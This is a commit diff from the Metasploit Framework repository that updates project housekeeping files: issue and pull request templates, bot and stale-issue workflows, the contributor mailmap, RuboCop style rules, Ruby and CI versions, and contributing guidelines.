automatic module_metadata_base.json update

Land #13906 , Add a generic LDAP hashdump module
Switch back to using fail_with now that the issue is fixed
2020-08-27 09:00:13 -05:00 · 2020-08-27 09:50:15 -04:00 · 2020-08-27 09:14:51 -04:00 · 2020-08-27 09:05:07 -04:00 · 2020-08-27 06:44:50 -05:00 · 2020-08-27 13:32:51 +02:00
2528 changed files with 173093 additions and 27511 deletions
@@ -1,3 +1,19 @@
+---
+name: Bug Report 🐞
+about: Something isn't working as expected? Here is the right place to report.
+labels: "bug"
+---
+
+<!--
+  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
+
+  Useful Links:
+  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+
+  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
+-->
+
 ## Steps to reproduce

 How'd you do it?
@@ -9,6 +25,10 @@ This section should also tell us any relevant information about the
 environment; for example, if an exploit that used to work is failing,
 tell us the victim operating system and service versions.

+## Were you following a specific guide/tutorial or reading documentation?
+
+If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
+
 ## Expected behavior

 What should happen?
@@ -38,4 +58,3 @@ Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneli

 What OS are you running Metasploit on?

-
@@ -0,0 +1,5 @@
+blank_issues_enabled: false
+contact_links:
+  - name: Termux Issues?
+    url: https://github.com/rapid7/metasploit-framework/issues/11023
+    about: Termux is not officially supported, check here for more info
@@ -0,0 +1,42 @@
+---
+name: Documentation 📝
+about: Suggest better docs coverage for a particular tool or process.
+labels: "suggestion-docs"
+---
+
+<!--
+  To make it easier for us to help you, please include as much useful information as possible.
+
+  Useful Links:
+  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+
+  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
+-->
+
+## Summary
+
+What problem(s) did you run into that caused you to request additional documentation? What questions do you think we should answer? What, if any, existing documentation relates to this proposal?
+
+Some recommended topics to cover:
+
+- List the topics you think should be here.
+- This list does not need to be exhaustive!
+
+### Motivation
+
+Why should we document this and who will benefit from it?
+
+## Steps to resolve this issue
+
+<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
+
+### Draft the doc
+
+- [ ] Write the doc, following the format listed in these resources:
+  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+  - [Example of a similar article]()
+
+### Open a pull request
+
+- [ ] Open a pull request with your work including the words "closes #[this issue's number]" in the pull request description
@@ -0,0 +1,26 @@
+---
+name: Feature Suggestion 💡
+about: Suggest a new idea for the project.
+labels: "suggestion-feature"
+---
+
+<!--
+  To make it easier for us to help you, please include as much useful information as possible.
+
+  Useful Links:
+  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+
+  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
+-->
+
+## Summary
+
+Brief explanation of the feature.
+
+### Basic example
+
+If the proposal involves a new or changed API, include a basic code example. Omit this section if it's not applicable.
+
+### Motivation
+
+Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -0,0 +1,26 @@
+---
+name: Module Suggestion 📦
+about: Suggest a new module idea to include in framework.
+labels: "suggestion-module"
+---
+
+<!--
+  To make it easier for us to help you, please include as much useful information as possible.
+
+  Useful Links:
+  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+
+  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
+-->
+
+## Summary
+
+Brief explanation of the module.
+
+### Basic example
+
+If you have a POC, blog post or any other useful references please let us know in this section.
+
+### Motivation
+
+Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -0,0 +1,20 @@
+---
+name: Question 🤔
+about: Usage question or discussion about Metasploit.
+labels: "question"
+---
+
+<!--
+  To make it easier for us to help you, please include as much useful information as possible.
+
+  Useful Links:
+  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+
+  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
+-->
+
+## Summary
+
+## Relevant information
+
+<!-- Provide as much useful information as you can -->
@@ -1,4 +1,3 @@
-
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.

@@ -15,3 +14,20 @@ List the steps needed to make sure this thing works
 - [ ] **Verify** the thing does not do what it should not
 - [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

+If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!
+
+Specific Hardware Examples:
+* Switches
+* Routers
+* IP Cameras
+* IoT devices
+
+Complex Software Examples:
+* Expensive proprietary software
+* Software with an extensive installation process
+* Software that requires exploit testing across multiple significantly different versions
+* Software without an English language UI
+
+We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
+
+Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metaspolit.com](mailto:msfdev@metaspolit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
@@ -0,0 +1,125 @@
+# Configuration for Github App - https://github.com/dessant/label-actions
+#
+# Note: Be aware of the edge cases of YAML when writing multiline strings:
+#   - https://yaml-multiline.info/
+#   - https://github.com/dessant/label-actions/issues/1
+pulls:
+  actions:
+    attic:
+      close: true
+      comment: |
+        Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it `attic` and closed it for now.
+
+        What does this generally mean? It could be one or more of several things:
+
+        - It doesn't look like there has been any activity on this pull request in a while
+        - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
+        - Sometimes the implementation isn't quite right and a different approach is necessary.
+
+        We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
+
+    needs-docs:
+      comment: |
+        Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
+
+        - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+        - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+        - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+
+    needs-linting:
+      comment: |
+        Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
+
+        We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
+
+        ```
+        rubocop <directory or file>
+        tools/dev/msftidy.rb <directory or file>
+        ```
+
+        You can automate most of these changes with the `-a` flag:
+
+        ```
+        rubocop -a <directory or file>
+        ```
+
+        Please update your branch after these have been made, and reach out if you have any problems.
+
+    needs-unique-branch:
+      close: true
+      comment: |
+        Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
+
+        Please create a new branch in your fork of framework and resubmit this from that branch.
+
+        If you are using Git on the command line that may look like:
+
+        ```
+        # Checkout the master branch
+        git checkout master
+
+        # Create a new branch for your feature
+        git checkout -b <BRANCH_NAME>
+
+        # Add your new files
+        git add modules/my-cool-new-module
+
+        # Commit your changes with a relevant message
+        git commit
+
+        # Push your changes to GitHub
+        git push origin <BRANCH_NAME>
+
+        # Now browse to the following URL and create your pull request!
+        # - https://github.com/rapid7/metasploit-framework/pulls
+        ```
+
+        This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+
+        Please do resubmit from a unique branch, we greatly value your contribution! :tada:
+
+    needs-testing-environment:
+      comment: |
+        Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
+
+        We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
+
+        To help unblock this pull request, please:
+
+        - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
+        - Or comment guided steps on how to set up our environment for testing this module
+        - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
+
+        Once there's a clear path for testing and evaluating this module, we can progress with this further.
+
+    needs-pull-request-template:
+      close: false
+      comment: |
+        When creating a pull request, please ensure that the default pull request template has been updated with the required details.
+
+issues:
+  actions:
+    termux:
+      comment: |
+        Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
+
+        However, Metasploit reportedly does work with Termux.
+
+        Refer to the following for more information:
+
+        * https://wiki.termux.com/wiki/Metasploit_Framework
+        * termux/termux-packages/issues/715
+
+    needs-issue-template:
+      close: true
+      comment: |
+        When creating an issue, please ensure that the default issue template has been updated with the required details.
+
+        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
+
+    potato:
+      close: true
+      comment: |
+        When creating an issue, please ensure that the default issue template has been updated with the required details.
+
+        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
@@ -0,0 +1,36 @@
+on:
+  schedule:
+    - cron: "0 16 * * *"
+name: Stale Bot workflow
+jobs:
+  build:
+    name: stale
+    runs-on: ubuntu-latest
+    steps:
+      - name: stale
+        id: stale
+        uses: actions/stale@v3
+        with:
+          repo-token: ${{ secrets.GITHUB_TOKEN }}
+          days-before-stale: 30
+          days-before-close: 30
+          operations-per-run: 10
+          stale-issue-message: |
+            Hi!
+
+            This issue has been left open with no activity for a while now.
+
+            We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
+            If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
+
+            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
+          close-issue-message: |
+            Hi again!
+
+            It’s been 60 days since anything happened on this issue, so we are going to close it.
+            Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
+
+            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
+          exempt-issue-labels: |
+            not stale
+          debug-only: true
@@ -1,59 +1,44 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
-bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                 <james_lee@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tatanus <tatanus@github>             <adam_compton@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
+cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
+dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
+dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
+space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>               <todb@metasploit.com>
+todb-r7 <todb-r7@github>               <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -62,9 +47,12 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
@@ -83,8 +71,13 @@ corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <pete
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
+dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
+egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                   <james_lee@rapid7.com>
 espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
@@ -110,6 +103,7 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -119,9 +113,15 @@ juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
+kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -151,12 +151,16 @@ rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
+sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+tatanus <tatanus@github>               <adam_compton@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -164,6 +168,7 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
@@ -11,6 +11,16 @@
 AllCops:
  TargetRubyVersion: 2.4

+require:
+  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+
+Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleDescriptionIndentation:
+  Enabled: true
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -59,6 +69,25 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

+Layout/FirstArgumentIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/ArgumentAlignment:
+  Enabled: true
+  EnforcedStyle: with_first_argument
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementLineBreak:
+  Enabled: true
+  Description: 'Enforce consistency by breaking hash elements on to new lines'
+
 Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
  Description: 'Almost all module metadata have space in brackets'
@@ -93,46 +122,47 @@ Style/TrailingCommaInArrayLiteral:

 Metrics/LineLength:
  Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
+    Metasploit modules often pattern match against very
+    long strings when identifying targets.
  Enabled: true
  Max: 180

 Metrics/BlockLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

 Metrics/MethodLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/UnneededPercentQ:
+Style/RedundantPercentQ:
  Enabled: false

 Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignHash:
-  Enabled: false
-  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+Layout/FirstArrayElementLineBreak:
+  Enabled: true
+  Description: 'This cop checks for a line break before the first element in a multi-line array.'

-Layout/EmptyLines:
-  Enabled: false
-  Description: 'these are used to increase readability'
+Layout/FirstArrayElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful to force values within the register_options array to have sane indentation'

 Layout/EmptyLinesAroundClassBody:
  Enabled: false
@@ -142,19 +172,24 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/AlignParameters:
+Layout/ExtraSpacing:
+  Description: 'Do not use unnecessary spacing.'
  Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+  # When true, allows most uses of extra spacing if the intent is to align
+  # things with the previous or next line, not counting empty lines or comment
+  # lines.
+  AllowForAlignment: false
+  # When true, allows things like 'obj.meth(arg)  # comment',
+  # rather than insisting on 'obj.meth(arg) # comment'.
+  # If done for alignment, either this OR AllowForAlignment will allow it.
+  AllowBeforeTrailingComments: false
+  # When true, forces the alignment of `=` in assignments on consecutive lines.
+  ForceEqualSignAlignment: false

 Style/For:
  Enabled: false
  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'

-Style/StringLiterals:
-  Enabled: false
-  Description: 'Single vs double quote fights are largely unproductive.'
-
 Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'
@@ -163,6 +198,22 @@ Style/IfUnlessModifier:
  Enabled: false
  Description: 'This style might save a couple of lines, but often makes code less clear'

+Style/PercentLiteralDelimiters:
+  Description: 'Use `%`-literal delimiters consistently.'
+  Enabled: true
+  # Specify the default preferred delimiter for all types with the 'default' key
+  # Override individual delimiters (even with default specified) by specifying
+  # an individual key
+  PreferredDelimiters:
+    default: ()
+    '%i': '[]'
+    '%I': '[]'
+    '%r': '{}'
+    '%w': '[]'
+    '%W': '[]'
+    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
+  VersionChanged: '0.48.1'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -177,6 +228,16 @@ Style/RedundantBegin:
    # end
    - 'modules/**/*'

+Style/SafeNavigation:
+  Description: >-
+    This cop transforms usages of a method call safeguarded by
+    a check for the existence of the object to
+    safe navigation (`&.`).
+
+    This has been disabled as in some scenarios it produced invalid code, and disobeyed the 'AllowedMethods'
+    configuration.
+  Enabled: false
+
 Documentation:
  Exclude:
    - 'modules/**/*'
@@ -1 +1 @@
-2.6.2
+2.6.6
@@ -11,8 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.5.5'
-  - '2.6.2'
+  - '2.5.8'
+  - '2.6.6'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -43,7 +43,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -1,63 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are mutliple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
